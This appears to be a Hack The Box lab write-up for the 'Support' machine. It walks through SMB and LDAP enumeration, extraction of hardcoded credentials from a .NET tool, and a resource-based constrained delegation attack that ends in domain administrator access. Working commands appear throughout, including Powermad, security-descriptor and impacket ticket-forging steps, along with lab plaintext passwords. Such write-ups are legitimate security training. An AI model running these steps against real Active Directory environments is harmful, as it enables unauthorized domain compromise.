Support Hackthebox Writeup

Enumeration

# Nmap 7.92 scan initiated Sat Jul 30 15:05:35 2022 as: nmap -A -oN nmap-scan -Pn 10.129.25.194
Nmap scan report for 10.129.25.194
Host is up (0.21s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-30 19:05:55Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -17s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-07-30T19:06:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 30 15:07:35 2022 -- 1 IP address (1 host up) scanned in 119.98 seconds

Starting up with SMB , let's see what we have:

└─$ smbclient -L //support.htb/ -N            

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to support.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

└─$ smbclient //support.htb/support-tools -N  
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 871836 blocks available
smb: \>

.NET SourceCode Reviewing

I download the file UserInfo.exe.zip I unzip the file and I found a .NET windows executable , I open it up on DNSpy, I find a key and an encrypted text which should be the password :

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

I copied the whole code and pasted it in Visual Studio , and then I changed the return call to :


Console.WriteLine(Encoding.Default.GetString(array2));

Executing the C# program will now provide us with the password:

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

Now to figure out where the password is being used:

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

LDAP Enumeration

It's being used to login to LDAP with the username ldap and the password nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz , Using a tool known as ldapdomaindump I am able to dump all user information , and computer information as well as group information:


ldapdomaindump -u 'support\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --no-html --no-grep support.htb -o output/

Visiting output/ I am able to find the following files:

└─$ ls -la
total 160
drwxr-xr-x 2 kali kali  4096 Jul 30 17:32 .
drwxr-xr-x 5 kali kali  4096 Jul 31 07:31 ..
-rw-r--r-- 1 kali kali  6886 Jul 30 17:31 domain_computers.json
-rw-r--r-- 1 kali kali 79816 Jul 30 17:31 domain_groups.json
-rw-r--r-- 1 kali kali  5652 Jul 30 17:31 domain_policy.json
-rw-r--r-- 1 kali kali     2 Jul 30 17:31 domain_trusts.json
-rw-r--r-- 1 kali kali 50183 Jul 30 17:31 domain_users.json

Or instead an alternative , A tool known as JXplorer:

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

Checking on the information of the user support , I get the following:

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

On Info key the value is Ironside47pleasure40Watchful, which I doubt must be the password , we can also get such information from the dumped json files by reading them and grepping cn=support


cat domain_users.json | grep -i "cn=support" -C 5

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

Initial Foothold

With the password I suppose we got from info key , I try to login with evil-winrm as the user support, luckily , I got access:

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

The flag is in C:\Users\support\Desktop\user.txt

Privilege Escalation

Now to check for support's privileges:

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

Seeing what groups the user support is in:

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

The user support has privileges to add a workstation to the domain, I did a little bit of article readings , and I ended up at my favourite all on one cheatsheets ired.team

For this to fully work , we first need to import a module known as Powermad, which can be found here

After downloading Powermad.ps1 I uploaded it to the directory I created in C:\Temp\ and then I imported it with the command:


Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

The commands above will create a new Computer Object, Now to get the SID of the new Computer Object:


Get-DomainComputer fake01

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

The SID is S-1-5-21-1677581083-3380853377-188903654-5101

Now we create a new raw security descriptor:



$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Now we apply the security descriptor bytes to dc:


Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

With the new Computer Object created, I shall use it to create a ticket for user administrator and use it to login :) , let's give it a run:


impacket-getST support.htb/fake01:123456 -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →


export KRB5CCNAME=administrator.ccache
impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

And now we have Administrator Access!

Briefing

The machine is overall amazingly well made! A full AD machine with a bit of code reviewing , debugging not to forget Computer Object TakeOver with Kerberos.

Enumeration

.NET SourceCode Reviewing

LDAP Enumeration

Initial Foothold

Privilege Escalation

Briefing

Read more

UnderPass Hackthebox Writeup

Secret Writeup Hackthebox

DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

File Transfer Tricks